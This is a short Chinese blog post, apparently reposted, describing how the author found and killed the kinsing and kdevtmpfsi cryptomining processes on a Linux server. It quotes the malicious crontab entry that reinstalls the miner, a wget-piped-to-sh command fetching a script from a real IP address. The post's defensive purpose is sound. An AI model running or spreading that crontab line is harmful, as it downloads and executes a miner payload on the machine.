linux 中了挖矿病毒

linux 中了挖矿病毒文章目录中毒特征磁盘cpu跑满100%如何处理反复发作中毒特征磁盘cpu跑满100%如何处理电脑中了挖矿病毒ps-aux|grepkinsingroot194470.01.811917235084?Sl4月150:04/var/tmp/kinsingroot272470.00.0112728…

大家好,又见面了,我是你们的朋友全栈君。

中毒特征磁盘cpu 跑满 100%

在这里插入图片描述

如何处理

电脑中了挖矿病毒

ps -aux | grep kinsing
root     19447  0.0  1.8 119172 35084 ?        Sl   415   0:04 /var/tmp/kinsing
root     27247  0.0  0.0 112728   972 pts/0    D+   07:47   0:00 grep --color=auto kinsing


ps -aux | grep kdevtmpfsi
root     25493 94.7  0.0 515448  1620 ?        Ssl  07:46   1:17 /tmp/kdevtmpfsi
root     27249  0.0  0.0 112728   980 pts/0    R+   07:47   0:00 grep --color=auto kdevtmpfsi


pkill -9 kinsing
pkill -9 kdevtmpfsi

反复发作

#杀掉以后还会换端口
pkill -9 kinsing
[root@localhost tmp]# ps -aux | grep kinsing
root      6087  0.0  0.0 112728   976 pts/0    S+   07:56   0:00 grep --color=auto kinsing
查看定时任务
crontab -l
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1
 
 pkill -9 kinsing
 ps -aux | grep kinsing
终于删掉了

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/133160.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • CFileDialog的使用方法简单介绍

    CFileDialog的使用方法简单介绍

    2021年11月30日
  • Java 零拷贝_java高性能编程

    Java 零拷贝_java高性能编程1、摘要零拷贝的“零”是指用户态和内核态间copy数据的次数为零。传统的数据copy(文件到文件、client到server等)涉及到四次用户态内核态切换、四次copy。四次copy中,两次在用户态和内核态间copy需要CPU参与、两次在内核态与IO设备间copy为DMA方式不需要CPU参与。零拷贝避免了用户态和内核态间的copy、减少了两次用户态内核态间的切换。零拷贝可以提高数据传输效率,但对于…

  • VMware P2V报错

    VMware P2V报错VMwareP2Vwin2008R2操作系统,第一步报错:fault.agentinstallfault.summary,无法在源主机临时安装agent代理,手工将vmware-converter-agent安装程序传到源主机安装,提示报错:error29142couldnotstartservicevstor2mntapi2.0driver(shared),原因是这台源主机以前

  • 现代数字图像处理—lena图像处理

    现代数字图像处理—lena图像处理实现幂律变换,对lena图像(灰度)进行处理,观察在不同gamma数值下图像的变化和特点。观察lena图像的直方图,实现lena图像的直方图均衡,观察效果。

  • dism失败 ox800f0818_Win 10 DISM 一直失败,错误: 0x8000ffff – Microsoft Community[通俗易懂]

    dism失败 ox800f0818_Win 10 DISM 一直失败,错误: 0x8000ffff – Microsoft Community[通俗易懂]你好!了解到您的问题。在使用RestoreHealth命令时是需要在检测出系统出现问题且映像文件可修复的情况下才能使用;Dism/Online/Cleanup-Image/ScanHealth这条命令将扫描全部系统文件并和官方系统文件对比,扫描计算机中的不一致情况。Dism/Online/Cleanup-Image/CheckHealth这条命令必须在前一条命令执行完以后,发现系统文件…

  • Negative Sampling 负采样详解[通俗易懂]

    Negative Sampling 负采样详解[通俗易懂]在word2vec中,为了简化训练的过程,经常会用到NegativeSampling负采样这个技巧,这个负采样到底是怎么样的呢?之前在我的博文word2vec算法理解和数学推导中对于word2vec有了很详细的数学推导,这里主要讲解一下负采样是如何降低word2vec的复杂度的。首先我们直接写出word2vec的目标函数,假设有一句话:query=w1,w2,w3,..,wnquery=…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号